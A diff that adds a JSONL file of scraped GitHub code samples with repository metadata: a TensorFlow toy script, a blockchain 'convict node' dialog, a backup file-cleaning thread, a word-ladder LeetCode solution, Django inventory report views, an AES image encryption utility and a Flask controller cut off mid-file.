diff --git "a/303.jsonl" "b/303.jsonl" new file mode 100644--- /dev/null +++ "b/303.jsonl" @@ -0,0 +1,1601 @@ +{"seq_id":"2500150661","text":"import tensorflow as tf\n\nvar = tf.Variable(0)\nholder = tf.placeholder(tf.int32)\napp_op = tf.add(var, holder)\nupdate_var = tf.assign(var ,add_op)\nmul_op = tf.mul(add_op, update_var)\n\nwith tf.Session() as session:\n summary_writer = tf.train.SummaryWriter('/var/log', graph = session.graph)\n session.run(tf.initialize_all_variables())\n\n result = session.run(mul_op, feed_dict={ holder: 5})\n\n print(result)\n","repo_name":"tamakiii-sandbox/hello-tensorflow","sub_path":"src/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19113808544","text":"import re\n\nimport in3\nfrom PySide2.QtWidgets import QDialog, QGroupBox, QLabel, QFormLayout, QLineEdit, QPushButton\n\nfrom blockchain.functions_signatures import CONVICT\n\n\"\"\"\nThis is the modal window to convict other node\n\"\"\"\nclass Convict(QDialog):\n\n def __init__(self, client):\n # Creating modal window to form request for contract\n QDialog.__init__(self)\n self.client = client\n self.modal_group_box = QGroupBox(\"Node\")\n self.modal_error_label = QLabel(\"Wrong address, account must be written in form : '0x...'.\")\n self.modal_group_layout = QFormLayout()\n self.hash_line = QLineEdit()\n self.modal_error_label.hide()\n\n self.hash_label = QLabel(\"\")\n self.hash_label.hide()\n\n self.modal_group_layout.addRow(QLabel(\"Convict node:\"))\n self.modal_group_layout.addRow(self.modal_error_label)\n self.modal_group_layout.addRow(self.hash_label)\n self.modal_group_layout.addRow(QLabel(\"Hash:\"), self.hash_line)\n self.modal_convict_btn = QPushButton(\"Convict\")\n self.p_key = \"\"\n self.contract = \"\"\n\n self.modal_cancel = QPushButton(\"Close\")\n self.modal_cancel.clicked.connect(self.modal_cancel_func)\n self.modal_convict_btn.clicked.connect(self.modal_convict)\n self.modal_group_layout.addRow(self.modal_convict_btn, self.modal_cancel)\n self.setLayout(self.modal_group_layout)\n\n \"\"\"\n Cancel function closes modal window\n \"\"\"\n def modal_cancel_func(self):\n self.modal_error_label.hide()\n self.hide()\n\n \"\"\"\n This function checks input data(hash provded) and sends transaction to the registry instance\n \"\"\"\n def modal_convict(self):\n if not re.match(\"0x[0-9A-Fa-f]{64}\", self.hash_line.text()):\n self.modal_error_label.setText(\"Wrong input. 
Hash should be written in the hexadecimal form(64 symbols of hash) in format: 0x...\")\n self.modal_error_label.show()\n return\n\n self.modal_error_label.hide()\n convict_node_abi = CONVICT\n sender = self.client.eth.account.recover('0x'+self.p_key)\n convict_node_tx = {\n \"to\": self.contract,\n \"gasLimit\": 200000,\n \"data\": self.client.eth.contract.encode(convict_node_abi, self.hash_line.text())\n }\n\n tx_hash = self.client.eth.account.send_transaction(sender, in3.eth.NewTransaction(**convict_node_tx))\n self.hash_label.setText(\"Latest transaction hash is: \" + tx_hash)\n self.hash_label.show()\n\n# a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a\n# bfbfbb1ed01fe85d529582b556e398a735c6a4110e7f9cce414d0d92ca7ca5c3","repo_name":"BritikovKI/incubed_cli","sub_path":"ui/contract_functions/convict_modal.py","file_name":"convict_modal.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19800780750","text":"\"\"\"\n\nA threaded class to clean old files.\n\n\"\"\"\n\nimport threading as thd\nimport os, time\n\nfrom function.configure import config\nfrom function.findFilesToClean import findFilesToClean, findFilesToCleanInRootOnly\n\n\n\nclass CleanThread(thd.Thread):\n def __init__(self, output, dirs):\n thd.Thread.__init__(self)\n self.output = output\n self.dirs = dirs\n\n\n def run(self):\n out = self.output\n\n colorUI = config['terminal']['colorCleanUI']\n colorClean = config['terminal']['colorCleanFile']\n\n out.setColorUI(colorUI)\n\n print(\"\\n\\n\")\n out.header()\n out.line()\n out.lineCentered(\"Starting Clean\", colorUI)\n out.line()\n out.footer()\n print(\"\")\n\n for k, v in sorted(self.dirs.items()):\n if k[-1] == \"*\":\n # Clean root directory:\n filesToClean = findFilesToCleanInRootOnly(v['src'], v['dest'])\n\n self.cleanSingleDirectory(k[:-1] + \" (just files)\",\n v['src'],\n v['dest'],\n filesToClean,\n colorUI,\n colorClean)\n\n # Clean subdirectories:\n for d in os.listdir(v['src']):\n if os.path.isdir(v['src'] + \"/\" + d):\n filesToClean = findFilesToClean(v['src'] + \"/\" + d,\n v['dest'] + \"/\" + d)\n\n self.cleanSingleDirectory(k[:-1] + \" (\" + d + \")\", \n v['src'] + \"/\" + d,\n v['dest'] + \"/\" + d,\n filesToClean, \n colorUI, \n colorClean)\n else:\n filesToClean = findFilesToClean(v['src'], v['dest'])\n\n self.cleanSingleDirectory(k, \n v['src'], \n v['dest'],\n filesToClean,\n colorUI,\n colorClean)\n\n\n print(\"\")\n out.header()\n out.line()\n out.lineCentered(\"Clean Complete\", colorUI)\n out.line()\n out.footer()\n print(\"\")\n\n out.setColorUI(config['terminal']['colorMenuUI'])\n\n\n\n\n\n def cleanSingleDirectory(self, name, src, dest, filesToClean, colorUI, colorClean):\n out = self.output\n\n print(\"\")\n time.sleep(int(config['general']['backupPause']))\n\n # Print header:\n out.header()\n out.lineCentered(name, colorUI)\n out.line()\n\n # Print src and dest:\n out.line(\"Source :: \" + src, colorUI)\n out.line(\"Destination :: \" + dest, colorUI)\n out.line()\n out.separator()\n out.line()\n\n\n # Do clean:\n numFiles = 0\n\n for f in filesToClean:\n if f[0] != 'C' and f[0] != 'c':\n if os.path.isdir(f):\n os.removedirs(f)\n\n elif os.path.isfile(f):\n os.remove(f)\n\n f = f[len(dest)+1:]\n f = f.replace(\"\\\\\", \"/\")\n\n out.line(f, colorClean)\n numFiles += 1\n\n out.line(\"{} File(s) removed\".format(numFiles))\n\n # Print footer:\n out.line()\n out.footer()\n 
print(\"\")\n\n\n\n","repo_name":"greene-giant/app-backup","sub_path":"src/function/cleanThread.py","file_name":"cleanThread.py","file_ext":"py","file_size_in_byte":3659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44789253299","text":"\"\"\"\n给定两个单词(beginWord 和 endWord)和一个字典 wordList,找出所有从 beginWord 到 endWord 的最短转换序列。转换需遵循如下规则:\n\n每次转换只能改变一个字母。\n转换后得到的单词必须是字典中的单词。\n说明:\n\n如果不存在这样的转换序列,返回一个空列表。\n所有单词具有相同的长度。\n所有单词只由小写字母组成。\n字典中不存在重复的单词。\n你可以假设 beginWord 和 endWord 是非空的,且二者不相同。\n示例 1:\n\n输入:\nbeginWord = \"hit\",\nendWord = \"cog\",\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\n\n输出:\n[\n [\"hit\",\"hot\",\"dot\",\"dog\",\"cog\"],\n  [\"hit\",\"hot\",\"lot\",\"log\",\"cog\"]\n]\n示例 2:\n\n输入:\nbeginWord = \"hit\"\nendWord = \"cog\"\nwordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/word-ladder-ii\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\"\"\"\nfrom collections import defaultdict\nfrom typing import List\nfrom collections import deque\nimport string\n\n\n# 2021.03.21 直奔题解,这道题是真难啊\nclass Solution:\n def findLadders(self, beginWord: str, endWord: str, wordList: List[str]) -> List[List[str]]:\n # 先将 wordList 放到哈希表里,便于判断某个单词是否在 wordList 里\n word_set = set(wordList)\n res = []\n if len(word_set) == 0 or endWord not in word_set:\n return res\n\n successors = defaultdict(set)\n # 第 1 步:使用广度优先遍历得到后继结点列表 successors\n # key:字符串,value:广度优先遍历过程中 key 的后继结点列表\n found = self.__bidirectional_bfs(beginWord, endWord, word_set, successors)\n if not found:\n return res\n # 第 2 步:基于后继结点列表 successors ,使用回溯算法得到所有最短路径列表\n path = [beginWord]\n self.__dfs(beginWord, endWord, successors, path, res)\n return res\n\n def __bidirectional_bfs(self, beginWord, endWord, word_set, successors):\n visited = set()\n visited.add(beginWord)\n visited.add(endWord)\n\n begin_visited = set()\n begin_visited.add(beginWord)\n\n end_visited = set()\n end_visited.add(endWord)\n\n found = False\n forward = True\n word_len = len(beginWord)\n while begin_visited:\n if len(begin_visited) > len(end_visited):\n begin_visited, end_visited = end_visited, begin_visited\n forward = not forward\n\n next_level_visited = set()\n for current_word in begin_visited:\n word_list = list(current_word)\n for j in range(word_len):\n origin_char = word_list[j]\n for k in string.ascii_lowercase:\n word_list[j] = k\n next_word = ''.join(word_list)\n if next_word in word_set:\n if next_word in end_visited:\n found = True\n # 在另一侧找到单词以后,还需把这一层关系添加到「后继结点列表」\n self.__add_to_successors(successors, forward, current_word, next_word)\n if next_word not in visited:\n next_level_visited.add(next_word)\n self.__add_to_successors(successors, forward, current_word, next_word)\n word_list[j] = origin_char\n begin_visited = next_level_visited\n # 取两集合全部的元素(并集,等价于将 next_level_visited 里的所有元素添加到 visited 里)\n visited |= next_level_visited\n if found:\n break\n return found\n\n def __add_to_successors(self, successors, forward, current_word, next_word):\n if forward:\n successors[current_word].add(next_word)\n else:\n successors[next_word].add(current_word)\n\n def __dfs(self, beginWord, endWord, successors, path, res):\n if beginWord == endWord:\n res.append(path[:])\n return\n\n if beginWord not in successors:\n return\n\n successor_words = successors[beginWord]\n for next_word in successor_words:\n path.append(next_word)\n self.__dfs(next_word, endWord, successors, path, res)\n 
path.pop()\n","repo_name":"ZhiyuSun/leetcode-practice","sub_path":"101-200/126_单词接龙II.py","file_name":"126_单词接龙II.py","file_ext":"py","file_size_in_byte":4573,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"38983611909","text":"from django.db.models import Sum, F, Window, Q, Prefetch, Subquery, OuterRef\nfrom django.db.models.functions.comparison import Coalesce\nfrom rest_framework import generics\nfrom rest_framework.pagination import LimitOffsetPagination\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom factors.models import Factor\nfrom factors.models.factor import FactorItem\nfrom helpers.auth import BasicCRUDPermission\nfrom helpers.querysets import get_deep_sum\nfrom reports.inventory.filters import InventoryFilter, AllWaresInventoryFilter\nfrom reports.inventory.serializers import WareInventorySerializer, AllWaresInventorySerializer, \\\n WarehouseInventorySerializer, AllWarehousesInventorySerializer\nfrom reports.lists.export_views import BaseListExportView\nfrom wares.models import Ware, Warehouse\n\nINVENTORY_INPUT_GROUP = Factor.INPUT_GROUP\nINVENTORY_OUTPUT_GROUP = Factor.OUTPUT_GROUP\n\n\ndef addSum(queryset, data):\n if len(data) > 0:\n remain = data[-1]['remain']\n else:\n remain = 0\n data.append({\n 'factor': {\n 'explanation': 'مجموع',\n },\n 'remain': remain,\n 'input': {\n 'count': queryset.filter(factor__type__in=INVENTORY_INPUT_GROUP).aggregate(Sum('count'))['count__sum'],\n 'fee': '-',\n 'value': queryset.filter(factor__type__in=INVENTORY_INPUT_GROUP).aggregate(value=Sum('calculated_value'))[\n 'value'\n ]\n },\n 'output': {\n 'count': queryset.filter(factor__type__in=INVENTORY_OUTPUT_GROUP).aggregate(Sum('count'))['count__sum'],\n 'fee': '-',\n 'value': queryset.filter(factor__type__in=INVENTORY_OUTPUT_GROUP).aggregate(\n value=Sum('calculated_value')\n )['value'],\n }\n })\n\n\nware_common_headers = [\n 'مقدار وارده',\n 'فی وارده',\n 'مبلغ وارده',\n 'مقدار صادره',\n 'فی صادره',\n 'مبلغ صادره',\n 'مقدار مانده',\n 'فی مانده',\n 'مبلغ مانده',\n]\n\n\ndef get_ware_common_columns(item):\n return [\n item['input']['count'],\n item['input']['fee'],\n item['input']['value'],\n item['output']['count'],\n item['output']['fee'],\n item['output']['value'],\n item['remain']['count'],\n item['remain']['fee'],\n item['remain']['value'],\n ]\n\n\nwarehouse_common_headers = [\n 'مقدار وارده',\n 'مقدار صادره',\n 'مقدار مانده',\n]\n\n\ndef get_warehouse_common_columns(item):\n return [\n item['input'],\n item['output'],\n item['remain'],\n ]\n\n\nclass WareInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.wareInventoryReport'\n serializer_class = WareInventorySerializer\n filterset_class = InventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n queryset = FactorItem.objects.inFinancialYear().filter(\n factor__is_defined=True,\n # factor__type__in=(\n # *Factor.SALE_GROUP,\n # *Factor.BUY_GROUP,\n # Factor.INPUT_ADJUSTMENT,\n # Factor.OUTPUT_ADJUSTMENT,\n # Factor.INPUT_TRANSFER,\n # Factor.OUTPUT_TRANSFER,\n # Factor.CONSUMPTION_WARE\n # )\n ).prefetch_related(\n 'factor__account',\n 'factor__sanad'\n ).order_by('factor__definition_date', 'id')\n\n queryset = queryset.annotate(\n definition_date=F('factor__definition_date'),\n type=F('factor__type')\n )\n\n queryset = queryset.annotate(\n comulative_input_count=Window(\n expression=Sum('count', 
filter=Q(type__in=INVENTORY_INPUT_GROUP)),\n order_by=(F('definition_date'), F('id'))\n ),\n comulative_output_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_OUTPUT_GROUP)),\n order_by=(F('definition_date'), F('id'))\n ),\n )\n\n queryset = self.filter_queryset(queryset)\n\n return queryset\n\n def list(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n addSum(queryset, data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass WareInventoryExportView(WareInventoryListView, BaseListExportView):\n filename = 'Ware Inventory'\n title = 'کاردکس کالا'\n\n def get_additional_data(self):\n item = self.get_queryset().first()\n if item:\n return [\n {\n 'text': 'کالا',\n 'value': item.ware.name\n },\n {\n 'text': 'انبار',\n 'value': item.warehouse.name\n }\n ]\n return []\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n addSum(qs, data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n\n\nclass AllWaresInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.allWaresInventoryReport'\n serializer_class = AllWaresInventorySerializer\n filterset_class = AllWaresInventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n financial_year = self.request.user.active_financial_year\n last_factor_item = Subquery(\n FactorItem.objects.inFinancialYear().filter(\n ware_id=OuterRef('ware_id')\n ).filter(\n factor__is_defined=True,\n # factor__type__in=(\n # *Factor.SALE_GROUP,\n # *Factor.BUY_GROUP,\n # Factor.INPUT_ADJUSTMENT,\n # Factor.OUTPUT_ADJUSTMENT,\n # Factor.CONSUMPTION_WARE\n # )\n ).order_by('factor__definition_date').values_list('id', flat=True)[:1]\n )\n\n input_filter = {\n 'factorItems__factor__is_defined': True,\n # 'factorItems__factor__type__in': Factor.BUY_GROUP,\n 'factorItems__factor__type__in': INVENTORY_INPUT_GROUP,\n 'factorItems__financial_year': financial_year,\n }\n\n output_filter = {\n 'factorItems__factor__is_defined': True,\n # 'factorItems__factor__type__in': (*Factor.SALE_GROUP, Factor.CONSUMPTION_WARE),\n 'factorItems__factor__type__in': INVENTORY_OUTPUT_GROUP,\n 'factorItems__financial_year': financial_year,\n }\n\n queryset = Ware.objects.inFinancialYear().prefetch_related(\n Prefetch('factorItems', queryset=FactorItem.objects.filter(id__in=last_factor_item))\n ).annotate(\n input_count=get_deep_sum('factorItems__count', filters=input_filter),\n input_value=get_deep_sum('factorItems__calculated_value', filters=input_filter),\n output_count=get_deep_sum('factorItems__count', filters=output_filter),\n output_value=get_deep_sum('factorItems__calculated_value', filters=output_filter),\n )\n\n queryset = queryset.annotate(\n remain_count=Coalesce(F('input_count') - F('output_count'), 0)\n )\n\n status = self.request.GET.get('status', 'all')\n if status == 'withRemain':\n queryset = queryset.filter(~Q(remain_count=0))\n elif status == 'withoutRemain':\n queryset = queryset.filter(remain_count=0)\n elif status == 'withTransaction':\n queryset = queryset.filter(~Q(input_count=0) | ~Q(output_count=0))\n elif status == 
'withoutTransaction':\n queryset = queryset.filter(input_count=0, output_count=0)\n\n return queryset\n\n def add_sum(self, queryset, data):\n totals = queryset.aggregate(\n total_input_count=Sum('input_count'),\n total_input_value=Sum('input_value'),\n total_output_count=Sum('output_count'),\n total_output_value=Sum('output_value'),\n )\n data.append({\n 'name': 'مجموع',\n 'input': {\n 'count': totals['total_input_count'],\n 'fee': ' - ',\n 'value': totals['total_input_value']\n },\n 'output': {\n 'count': totals['total_output_count'],\n 'fee': ' - ',\n 'value': totals['total_output_value']\n },\n 'remain': {\n 'count': totals['total_input_count'] - totals['total_output_count'],\n 'fee': ' - ',\n 'value': totals['total_input_value'] - totals['total_output_value']\n },\n })\n\n def list(self, request, *args, **kwargs):\n params = self.request.GET\n\n factor_items = self.get_queryset()\n\n queryset = self.filterset_class(params, queryset=factor_items).qs\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n self.add_sum(queryset, data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass AllWaresInventoryExportView(AllWaresInventoryListView, BaseListExportView):\n filename = 'All Ware Inventory'\n title = 'کاردکس همه کالا ها'\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n self.add_sum(qs, data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n\n\nclass WarehouseInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.warehouseInventoryReport'\n serializer_class = WarehouseInventorySerializer\n filterset_class = InventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n queryset = FactorItem.objects.inFinancialYear().filter(\n factor__is_defined=True\n ).prefetch_related(\n 'factor__account',\n 'factor__sanad',\n 'warehouse'\n ).order_by(\n 'factor__definition_date', 'id'\n ).annotate(\n definition_date=F('factor__definition_date'),\n type=F('factor__type')\n ).annotate(\n cumulative_input_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_INPUT_GROUP)),\n order_by=[F('definition_date').asc(), F('id').asc()]\n ),\n cumulative_output_count=Window(\n expression=Sum('count', filter=Q(type__in=INVENTORY_OUTPUT_GROUP)),\n order_by=[F('definition_date').asc(), F('id').asc()]\n )\n )\n\n return queryset\n\n def add_sum(self, data):\n data.append({\n 'factor': {\n 'account': {\n 'name': 'جمع'\n }\n },\n 'input': data[-1]['cumulative_count']['input'],\n 'output': data[-1]['cumulative_count']['output'],\n 'remain': data[-1]['remain']\n })\n\n def list(self, request, *args, **kwargs):\n params = self.request.GET\n\n factor_items = self.get_queryset()\n\n queryset = self.filterset_class(params, queryset=factor_items).qs\n\n paginator = self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n self.add_sum(data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass 
WarehouseInventoryExportView(WarehouseInventoryListView, BaseListExportView):\n filename = 'Warehouse Inventory'\n title = 'کاردکس کالا'\n\n def get_additional_data(self):\n item = self.get_queryset().first()\n if item:\n return [\n {\n 'text': 'کالا',\n 'value': item.ware.name\n },\n {\n 'text': 'انبار',\n 'value': item.warehouse.name if self.request.GET.get('warehouse') else 'همه انبار ها'\n }\n ]\n return []\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n self.add_sum(data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n\n\nclass AllWarehousesInventoryListView(generics.ListAPIView):\n permission_classes = (IsAuthenticated, BasicCRUDPermission)\n permission_codename = 'get.allWarehousesInventoryReport'\n serializer_class = AllWarehousesInventorySerializer\n filterset_class = AllWaresInventoryFilter\n ordering_fields = '__all__'\n pagination_class = LimitOffsetPagination\n\n def get_queryset(self):\n warehouse = self.request.GET.get('warehouse', None)\n financial_year = self.request.user.active_financial_year\n\n input_filter = {\n 'factorItems__factor__is_defined': True,\n 'factorItems__factor__financial_year': financial_year,\n 'factorItems__factor__type__in': INVENTORY_INPUT_GROUP\n }\n\n output_filter = {\n 'factorItems__factor__is_defined': True,\n 'factorItems__factor__financial_year': financial_year,\n 'factorItems__factor__type__in': INVENTORY_OUTPUT_GROUP\n }\n\n queryset = Ware.objects.inFinancialYear()\n\n if warehouse:\n input_filter['factorItems__warehouse_id'] = warehouse\n output_filter['factorItems__warehouse_id'] = warehouse\n\n queryset = queryset.filter(\n Q(warehouse_id=warehouse) |\n Q(children__warehouse_id=warehouse) |\n Q(children__children__warehouse_id=warehouse) |\n Q(children__children__children__warehouse_id=warehouse) |\n\n (\n Q(factorItems__warehouse_id=warehouse) &\n Q(factorItems__factor__financial_year=financial_year)\n ) | (\n Q(children__factorItems__warehouse_id=warehouse) &\n Q(children__factorItems__factor__financial_year=financial_year)\n ) | (\n Q(children__children__factorItems__warehouse_id=warehouse) &\n Q(children__children__factorItems__factor__financial_year=financial_year)\n ) | (\n Q(children__children__children__factorItems__warehouse_id=warehouse) &\n Q(children__children__factorItems__factor__financial_year=financial_year)\n )\n\n )\n\n queryset = queryset.annotate(\n input=get_deep_sum('factorItems__count', filters=input_filter),\n output=get_deep_sum('factorItems__count', filters=output_filter)\n )\n\n queryset = queryset.annotate(\n remain=Coalesce(F('input') - F('output'), 0)\n\n )\n\n status = self.request.GET.get('status', 'all')\n if status == 'withRemain':\n queryset = queryset.filter(~Q(remain=0))\n elif status == 'withoutRemain':\n queryset = queryset.filter(remain=0)\n elif status == 'withTransaction':\n queryset = queryset.filter(~Q(input=0) | ~Q(output=0))\n elif status == 'withoutTransaction':\n queryset = queryset.filter(input=0, output=0)\n\n return queryset\n\n def add_sum(self, queryset, data):\n totals = queryset.aggregate(\n total_input_count=Sum('input'),\n total_output_count=Sum('output'),\n )\n data.append({\n 'name': 'جمع',\n 'input': totals['total_input_count'],\n 'output': totals['total_output_count'],\n 'remain': totals['total_input_count'] - totals['total_output_count']\n })\n\n def list(self, request, *args, **kwargs):\n queryset = self.filter_queryset(self.get_queryset())\n\n paginator = 
self.pagination_class()\n page = paginator.paginate_queryset(queryset, request)\n\n serializer = self.serializer_class(page, many=True)\n data = serializer.data\n\n if len(data) and paginator.offset + paginator.limit >= paginator.count:\n self.add_sum(queryset, data)\n\n response = paginator.get_paginated_response(data)\n return response\n\n\nclass AllWarehousesInventoryExportView(AllWarehousesInventoryListView, BaseListExportView):\n filename = 'All Warehouses Inventory'\n title = 'کاردکس انبار همه کالا ها'\n\n def get_additional_data(self):\n data = self.request.GET.copy()\n warehouse = data.get('warehouse')\n if warehouse:\n warehouse = Warehouse.objects.get(pk=warehouse).name\n else:\n warehouse = 'همه انبار ها'\n\n return [\n {\n 'text': 'انبار',\n 'value': warehouse\n }\n ]\n\n def get_rows(self):\n qs = super().get_rows()\n data = self.serializer_class(qs, many=True).data\n self.add_sum(qs, data)\n return data\n\n def get(self, request, *args, **kwargs):\n return self.get_response(request, *args, **kwargs)\n","repo_name":"sorooshmorshedi/back","sub_path":"reports/inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17647070005","text":"\"\"\" \nThis code is to encrypt and decrypt image(s).\nAuthor: Mrinal Kanti Dhar\nCo-author: ChatGPT\n\"\"\"\n\nfrom cryptography.hazmat.primitives import padding\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nimport os\n\ndef encryt(im_loc, encrypted_im_name:str='encrypted_image.bin', key_name:str='key.bin', \n salt_byte:int=16, key_byte:int=32, iv_byte:int=16):\n \n \"\"\" This function encrypts an input\n \n Inputs\n ========\n im_loc (str): Entire image location including the image name with extension.\n encrypted_im_name (str): Name that will be used to store the encrypted image.\n key_name (str): Name that will be used to store the key.\n salt_byte (int): Byte value for salt that will be added to the input image. The value indicates a byte value.\n key_byte (int): Byte value to generate key randomly.\n iv_byte (int): Byte value to generate Initialization Vector randomly. 
\n \n \"\"\"\n \n # Generate a random salt\n salt = os.urandom(salt_byte) # 16 bytes\n \n key = os.urandom(key_byte) # 32 bytes\n \n iv = os.urandom(iv_byte) # 16 bytes\n \n # Create a Cipher object\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n \n # Create an encryptor\n encryptor = cipher.encryptor()\n \n # Read the image data\n with open(im_loc, 'rb') as img_file:\n image_data = img_file.read()\n \n # Apply PKCS7 padding to the image data\n padder = padding.PKCS7(128).padder()\n padded_image_data = padder.update(image_data) + padder.finalize()\n \n # Encrypt the padded image data\n ct = encryptor.update(padded_image_data) + encryptor.finalize()\n \n # Write the encrypted data to a file\n with open(encrypted_im_name, 'wb') as encrypted_file:\n encrypted_file.write(salt + iv + ct)\n \n # save the key\n with open(key_name, \"wb\") as k:\n k.write(key)\n\n#%% Decrypt\ndef decrypt(encrypted_im_loc, key_loc, decrypted_im_name:str='decrypted_image.jpg',\n salt_byte:int=16, key_byte:int=32, iv_byte:int=16):\n \"\"\" This function decrypt an encrypted image\n Inputs\n =========\n encrypted_im_loc (str): Entire encrypted image location including the image name with extension.\n key_loc (str): Entire key location including the image name with extension.\n decrypted_im_name (str): Name that will be used to store the decrypted image.\n salt_byte (int): Byte value for salt.\n key_byte (int): Byte value for key.\n iv_byte (int): Byte value for Initialization Vector.\n \"\"\"\n # Read the encrypted data from the file\n with open(encrypted_im_loc, 'rb') as encrypted_file:\n encrypted_data = encrypted_file.read()\n \n # Extract the salt, IV, and ciphertext from the encrypted data\n salt = encrypted_data[:salt_byte]\n iv = encrypted_data[salt_byte:salt_byte+iv_byte]\n ct = encrypted_data[salt_byte+iv_byte:]\n \n # Read key\n with open(key_loc, 'rb') as k:\n key = k.read()\n \n # Create a Cipher object for decryption\n cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())\n \n # Create a decryptor\n decryptor = cipher.decryptor()\n \n # Decrypt the ciphertext\n padded_image_data = decryptor.update(ct) + decryptor.finalize()\n \n # Remove PKCS7 padding\n unpadder = padding.PKCS7(128).unpadder()\n image_data = unpadder.update(padded_image_data)\n try:\n image_data += unpadder.finalize()\n except ValueError:\n # Padding is not valid, so just use the unpadded data\n pass\n \n # Write the decrypted image data to a file\n with open(decrypted_im_name, 'wb') as decrypted_file:\n decrypted_file.write(image_data)\n\n#%%\nif __name__ == \"__main__\":\n import time\n \n root = r'D:\\Mou\\kvasir-dataset-v2\\dyed-lifted-polyps' # this dir contains all images\n \n encrypt_dir = r'D:\\Mou\\encrypted' # where the encrypted images will stored\n decrypt_dir = r'D:\\Mou\\decrypted' # where the decrypted images will stored \n key_dir = r'D:\\Mou\\keys' # where the keys will be stored\n \n os.makedirs(encrypt_dir, exist_ok=True)\n os.makedirs(decrypt_dir, exist_ok=True)\n os.makedirs(key_dir, exist_ok=True)\n \n names = os.listdir(root)\n \n start = time.time()\n \n #%% Encryption\n for name in names:\n name_only = os.path.splitext(name)[0]\n im_loc = os.path.join(root, name)\n \n encryt(im_loc, \n encrypted_im_name=os.path.join(encrypt_dir, name_only+'.bin'), \n key_name=os.path.join(key_dir, name_only+'.bin'), \n salt_byte=16, key_byte=32, iv_byte=16)\n \n end = time.time()\n encrypt_time = end - start\n \n #%% Decryption\n start = time.time()\n for name in names:\n 
name_only = os.path.splitext(name)[0]\n encrypted_im_loc = os.path.join(encrypt_dir, name_only + '.bin')\n key_loc = os.path.join(key_dir, name_only+'.bin')\n \n decrypt(encrypted_im_loc, key_loc, \n decrypted_im_name=os.path.join(decrypt_dir, name),\n salt_byte=16, key_byte=32, iv_byte=16)\n\n end = time.time()\n decrypt_time = end - start\n \n with open('crypto_time.txt', \"w\") as f:\n print(\"Encryption time:\", encrypt_time, file=f)\n print(\"Decryption time:\", decrypt_time, file=f)\n \n \n","repo_name":"mrinal054/my_utils","sub_path":"crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12165420090","text":"#!/usr/bin/env python3\n\n\nimport sys\nfrom consts import path_on_servers\n\n\nclass Binary:\n\n def __init__(self, path, server):\n self.path_local = path\n self.server = server\n self.path_on_server = \"{}/binary\".format(path_on_servers)\n\n def setup(self):\n ex = self.server.copy_executable(self.path_local, path_on_servers,\n \"binary\")\n if ex != 0:\n err = \"Error while setting up binary on {}\".format(self.server.ip)\n sys.exit(err)\n","repo_name":"sakshamsharma/distributed-control-panel","sub_path":"dcp/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"39693468030","text":"from flask import Blueprint as Controller, request\n\nfrom common import Result\nfrom service import SysParamsService\nfrom decorator import has_authority, operate_log\n\nsys_params_controller = Controller(\"sys_params\", __name__, url_prefix='/sys/params')\n\n\n@sys_params_controller.route(\"/page\", 